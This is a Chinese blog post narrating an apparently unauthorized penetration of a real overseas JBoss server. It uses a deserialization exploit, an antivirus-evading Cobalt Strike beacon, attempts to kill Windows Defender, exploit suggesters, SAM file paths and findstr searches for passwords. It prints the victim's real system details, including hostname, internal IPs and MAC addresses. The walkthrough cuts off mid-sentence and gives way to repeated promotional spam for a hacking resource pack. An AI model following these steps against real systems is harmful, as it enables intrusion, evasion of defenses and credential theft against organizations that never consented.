内网横向免杀对抗渗透,从零基础到精通,收藏这篇就够了!

装备别搞丢!渗透测试工具箱大公开

  • Jexboss:漏洞挖掘界的“老中医”,专治各种不服的反序列化。
  • Kali Linux:渗透测试界的瑞士军刀,只有你想不到,没有它做不到。
  • CS 4.3:红队神器,团队协作,一键上线,妈妈再也不用担心我找不到队友。
  • Windows杀软在线查询(一二三):三管齐下,让杀软在你面前无所遁形。
  • Fscan:内网扫描界的“闪电侠”,速度快到没朋友。
  • 潮汐Shellcode免杀:免杀界的“小清新”,轻量级bypass,谁用谁知道。
  • LSTAR:CS插件界的“变形金刚”,功能强大到你尖叫。
  • CobaltStrike其他插件:CS的“后宫佳丽三千”,总有一款适合你。
  • PEASS-ng:权限提升界的“挖掘机”,扫遍全盘,不放过任何一个漏洞。
  • PrintSpoofer:提权界的“平头哥”,不服就干,生死看淡。

渗透,从“外”开始

1、为了提升内网渗透技能,让我们把目光投向海外站点。

2、发现某Jboss站点存在反序列化漏洞,但是,Jexboss竟然无法成功利用。难道是水逆?

python jexboss.py -u https://xx.xx.xx/

3、别慌,祭出“java反序列化终极测试工具 by 6哥”,一击命中,瞬间拿下!

4、执行whoami,发现只是个普通用户,这怎么能忍?

5、ipconfig走一波,摸清当前IP段,为后续的横向渗透做准备。

6、tasklist /svc,看看有没有“老朋友”杀软。

7、将进程信息复制到Windows杀软在线查询,果然有货!

8、Ping一下百度,看看能不能出网。Good!可以连通外网。

CS上线:躲猫猫大作战

1、既然有杀软,直接上传CS马肯定凉凉。这次我们选择潮汐shellcode免杀,体积小,上传速度快,简直是居家旅行必备。

2、CS生成C语言的shellcode,复制到剪贴板。

3、粘贴到潮汐免杀网站,生成exe,上传到目标机器,执行!

C:\usr\desarrollo\jboss-5.1.0.GA\server\sigAmeServer\deploy\ROOT.war\TideAv-Go1-2023-02-04-10-31-21-221261.exe tide

4、CS成功“喜提”肉鸡一枚!

权限提升:是时候表演真正的技术了

搞事情之前,先收集情报

1、看看当前用户是谁,有什么特权。

whoami
whoami /priv

2、systeminfo,摸清系统版本和补丁信息,知己知彼,百战不殆。

Nombre de host:                            AMEPROWEBEGAD
Nombre del sistema operativo:              Microsoft Windows 10 Pro
Versi¢n del sistema operativo:             10.0.19044 N/D Compilaci¢n 19044
Fabricante del sistema operativo:          Microsoft Corporation
Configuraci¢n del sistema operativo:       Estaci¢n de trabajo miembro
Tipo de compilaci¢n del sistema operativo: Multiprocessor Free
Propiedad de:                              appzusr
Organizaci¢n registrada:                   
Id. del producto:                          00331-10000-00001-AA727
Fecha de instalaci¢n original:             13/5/2022, 14:03:47
Tiempo de arranque del sistema:            1/2/2023, 16:50:29
Fabricante del sistema:                    VMware, Inc.
Modelo el sistema:                         VMware Virtual Platform
Tipo de sistema:                           x64-based PC
Procesador(es):                            2 Procesadores instalados.
                                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz
                                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2494 Mhz
Versi¢n del BIOS:                          Phoenix Technologies LTD 6.00, 12/11/2020
Directorio de Windows:                     C:Windows
Directorio de sistema:                     C:Windowssystem32
Dispositivo de arranque:                   DeviceHarddiskVolume1
Configuraci¢n regional del sistema:        ezs-mx;Espa¤ol (M‚xico)
Idioma de entrada:                         es-mx;Espa¤ol (M‚xico)
Zona horaria:                              (UTC-06:00) Guadalajara, Ciudad de M‚xico, Monterrey
Cantidad total de memoria f¡sica:          4.095 MB
Memoria f¡sica disponible:                 1.201 MB
Memoria virtual: tama¤o m ximo:            4.799 MB
Memoria virtual: disponible:               1.147 MB
Memoria virtual: en uso:                   3.652 MB
Ubicaci¢n(es) de archivo de paginaci¢n:    C:pagefile.sys
Dominio:                                   ame.local
Servidor de inicio de sesi¢n:              \AMEPROWEBEGAD
Revisi¢n(es):                              4 revisi¢n(es) instaladas.
                                           [01]: KB5004331
                                           [02]: KB5003791
                                           [03]: KB5006670
                                           [04]: KB5005699
Tarjeta(s) de red:                         1 Tarjetas de interfaz de red instaladas. z
                                          [01]: Intel(R) PRO/1000 MT Network Connection
                                                 Nombre de conexi¢n: Ethernet0
                                                 DHCP habilitado:    No
                                                 Direcciones IP
                                                 [01]: 172.16.2.100
                                                 [02]: fe80::591:ae09:eee1:888e
Requisitos Hyper-V:                        Se detect¢ un hipervisor. No se mostrar n las caracter¡sticas necesarias para Hyper-V.

3、netstat -ano,看看开了哪些“大门”,有没有什么可乘之机。

Conexiones activas

  Proto  Direcci¢n local          Direcci¢n remota        Estado           PID

  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       600

  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4

  TCP    0.0.0.0:1090           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:1098           0.0.0.0:0              LISTENING       7600

  TCP z   0.0.0.0:1099           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1072

  TCP    0.0.0.0:3873           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:4445           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:4446           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:4457           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:4712           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:4713           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       6652

  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4

  TCP    0.0.0.0:7070           0.0.0.0:0              LISTENING       3564

  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:8080           0.0.0.0:0    z          LISTENING       7600

  TCP    0.0.0.0:8083           0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:46305          0.0.0.0:0              LISTENING       7600

  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4

  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       832

  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       680

  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1416

  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1612

  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2452

  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       832

  TCP    0.0.0.0:49672          0.0.0.0:0              LISTENING       3404

  TCP    0.0.0.0:49704          0.0.0.0:0              LISTENING       820

  TCP    0.0.0.0:49708          0.0.0.0:0              LISTENING       3048

  TCP    0.0.0.0:51407          0.0.0.0:0              LISTENING       7600

  TCP    127z.0.0.1:5140         0.0.0.0:0              LISTENING       7172

  TCP    127.0.0.1:51411        0.0.0.0:0              LISTENING       7600

  TCP    172.16.2.100:139       0.0.0.0:0              LISTENING       4

  TCP    172.16.2.100:8080      172.16.12.34:42602     TIME_WAIT       0

  TCP    172.16.2.100:8080      172.16.12.34:42610     ESTABLISHED     7600

  TCP    172.16.2.100:8080      172.16.12.34:55672     TIME_WAIT       0

  TCP    172.16.2.100:8080      172.16.12.34:55686     TIME_WAIT       0

  TCP    172.16.2.100:49717     38.90.226.62:8883      ESTABLISHED     3576

  TCP    172.16.2.100:50848     172.16.2.100:51407     TIME_WAIT       0

  TCP    172.16.2.100:51413     172.16.2.190:1433      ESTABLISHED     7600

  TCP    172.16.2.100:51447     172.16.2.190:1433      ESTABLISHED     7600

  TCP    172.16.2.100:56063     172.16.2.11:2222       ESTABLISHED     3576

  TCP    172.16.2.100:56538     92.223.66.48:443       ESTABLISHED     3564

  TCP    [::]:135               [::]:0                 LISTENINzG       600

  TCP    [::]:445               [::]:0                 LISTENING       4

  TCP    [::]:1090              [::]:0                 LISTENING       7600

  TCP    [::]:1098              [::]:0                 LISTENING       7600

  TCP    [::]:1099              [::]:0                 LISTENING       7600

  TCP    [::]:3389              [::]:0                 LISTENING       1072

  TCP    [::]:3873              [::]:0                 LISTENING       7600

  TCP    [::]:4444              [::]:0                 LISTENING       7600

  TCP    [::]:4445              [::]:0                 LISTENING       7600

  TCP    [::]:4446              [::]:0                 LISTENING       7600

  TCP    [::]:4457              [::]:0                 LISTENING       7600

  TCP    [::]:4712              [::]:0                 LISTENING       7600

  TCP    [::]:4713              [::]:0                 LISTENING       7600

  TCP    [::]:5985              [::]:0                 LISTENING       4

  TCP    [::]:8009            z  [::]:0                 LISTENING       7600

  TCP    [::]:8080              [::]:0                 LISTENING       7600

  TCP    [::]:8083              [::]:0                 LISTENING       7600

  TCP    [::]:46305             [::]:0                 LISTENING       7600

  TCP    [::]:47001             [::]:0                 LISTENING       4

  TCP    [::]:49664             [::]:0                 LISTENING       832

  TCP    [::]:49665             [::]:0                 LISTENING       680

  TCP    [::]:49666             [::]:0                 LISTENING       1416

  TCP    [::]:49667             [::]:0                 LISTENING       1612

  TCP    [::]:49668             [::]:0                 LISTENING       2452

  TCP    [::]:49671             [::]:0                 LISTENING       832

  TCP    [::]:49672             [::]:0                 LISTENING       3404

  TCP    [::]:49704             [::]:0                 LISTENING       820

  TCP    [::]:49708             [::]:0                 LISTENING       30z48

  TCP    [::]:51407             [::]:0                 LISTENING       7600

  UDP    0.0.0.0:123            *:*                                    1268

  UDP    0.0.0.0:500            *:*                                    3040

  UDP    0.0.0.0:3389           *:*                                    1072

  UDP    0.0.0.0:4500           *:*                                    3040

  UDP    0.0.0.0:5050           *:*                                    6652

  UDP    0.0.0.0:5353           *:*                                    1432

  UDP    0.0.0.0:5355           *:*                                    1432

  UDP    0.0.0.0:50001          *:*                                    3564

  UDP    0.0.0.0:50007          *:*                                    1240

  UDP    0.0.0.0:56152          *:*                                    1240

  UDP    0.0.0.0:61593          *:*                                    1240

  UDP    0.0.0.0:64843          *:*                                    1240

  UDP    127.0.0.1:1900         *z:*                                    2876

  UDP    127.0.0.1:50434        *:*                                    832

  UDP    127.0.0.1:55588        *:*                                    2876

  UDP    127.0.0.1:65220        *:*                                    1868

  UDP    127.0.0.1:65222        *:*                                    2360

  UDP    172.16.2.100:137       *:*                                    4

  UDP    172.16.2.100:138       *:*                                    4

  UDP    172.16.2.100:1900      *:*                                    2876

  UDP    172.16.2.100:55587     *:*                                    2876

  UDP    [::]:123               *:*                                    1268

  UDP    [::]:500               *:*                                    3040

  UDP    [::]:3389              *:*                                    1072

  UDP    [::]:4500              *:*                                    3040

  UDP    [::]:5353              *:*                                    1432z

  UDP    [::]:5355              *:*                                    1432

  UDP    [::1]:1900             *:*                                    2876

  UDP    [::1]:55586            *:*                                    2876

  UDP    [fe80::591:ae09:eee1:888e%13]:1900  *:*                                    2876

  UDP    [fe80::591:ae09:eee1:888e%13]:55585  *:*                                    2876

4、shell ipconfig /all,再确认一下网卡信息。

Configuración IP de Windows

   Nombre de host. . . . . . . . . : AMEPROWEBEGAD

   Sufijo DNS principal  . . . . . : ame.local

   Tipo de nodo. . . . . . . . . . : híbrido

   Enrutamiento IP habilitado. . : no

   Proxy WINS habilitado . . . . . : no

   Lista de búsqueda de sufijos DNS: ame.local

Adaptador de Ethernet Ethernet0:

   Sufijo DNS específico para la conexión. . :

   Descripción . . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection

   Dirección física. . . . . . . . . . . . . : 00-50-56-B2-9D-FE

   DHCP habilitado . . . . . . . . . . . . . : no

   Configuración automática habilitada . . . : sí

   Vínculo: dirección IPv6 local. . . : fe80::591:ae09:eee1:888e%13(Preferido)

   Dirección IPv4. . . . . . . . . . . . . . : 172.16.2.100(Preferido)

   Máscara de subred . . . . . . . . . . . . : 255.255.255.0

   Puerta de enlace predeterminada . . . . . : 172.16.2.254

   IAID DHCPv6 . . . . . . . . . . . . . . . : 100683862

   DUID de cliente DHCPv6. . . . . . . . . . : 00-01-00-01-2A-10-71-A7-00-50-56-B2-9D-FE

   Servidores DNS. . . . . . . . . . . . . . : 172.16.2.20

                                       10.0.0.1

   NetBIOS sobre TCP/IP. . . . . . . . . . . : habilitado

5、shell arp -a,路由表信息也安排上。

Interfaz: 172.16.2.100 --- 0xd

  Dirección de Internet          Dirección física      Tipo

  172.16.2.11           00-50-56-b2-ac-66     dinámico

  172.16.2.20           00-50-56-b2-d2-30     dinámico

  172.16.2.150          00-90-a9-d6-91-01     dinámico

  172.16.2.190          00-50-56-b2-99-b0     dinámico

  172.16.2.254          00-00-5e-00-01-02     dinámico

  172.16.2.255          ff-ff-ff-ff-ff-ff     estático

  224.0.0.22            01-00-5e-00-00-16     estático

  224.0.0.251           01-00-5e-00-00-fb     estático

  224.0.0.252           01-00-5e-00-00-fc     estático

  239.255.255.250       01-00-5e-7f-ff-fa     estático

6、shell systeminfo,确认一下,果然存在域环境。

插件提权?不存在的!

1、先试试CS自带的插件提权,结果,卒!不仅没提权成功,CS连接还断了。看来杀软也不是吃素的。

关掉杀软?想多了!

1、既然硬的不行,那就来软的,尝试关闭杀软。通过进程列表发现杀软进程名是MsMpEng.exe

tskill MsMpEng
tasklist /svc

2、然而,理想很丰满,现实很骨感。杀软竟然会自动重启,简直是打不死的小强。

Windows-Exploit-Suggester:漏洞在哪儿?

1、安装更新脚本,这个步骤不能少。

python2 -m pip install --user xlrd==1.1.0
python2 windows-exploit-suggester.py --update

2、把systeminfo的内容保存到systeminfo.txt,然后开始扫描。

python2 ./windows-exploit-suggester.py --database 2023-02-06-mssb.xls --systeminfo systeminfo.txt

3、找到几个EXP,上传测试,结果,全部阵亡。

PEASS-ng:你瞅啥?

1、上传到目标机器,结果直接被杀软干掉。看来,想在杀软眼皮底下搞事情,还是太难了。

winPEASany.exe log=result.txt

查看SAM密码文件:想peach?

1、SAM密码文件位置如下:

system文件位置:C:WindowsSystem32configSYSTEM
sam文件位置:C:WindowsSystem32configSAM

2、但是,权限不够,根本无法查看。

windows敏感文件:大海捞针

1、查看最近打开的文档,看看有没有意外收获。

dir %APPDATA%MicrosoftWindowsRecent

2、递归搜索后面的文件,看看有没有password字段。

findstr /si password  config.*  *.ini *.txt *.properties

3、递归查找当前目录包含conf的文件。

dir /a /s /b "*conf*" > 1.txt

4、递归查找目录下的txt中的password字段。

findstr /s /i /c:"Password" 目录*.txt

5、递归查找目录下的敏感

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************

猜你喜欢

转载自blog.csdn.net/Javachichi/article/details/146983611
今日推荐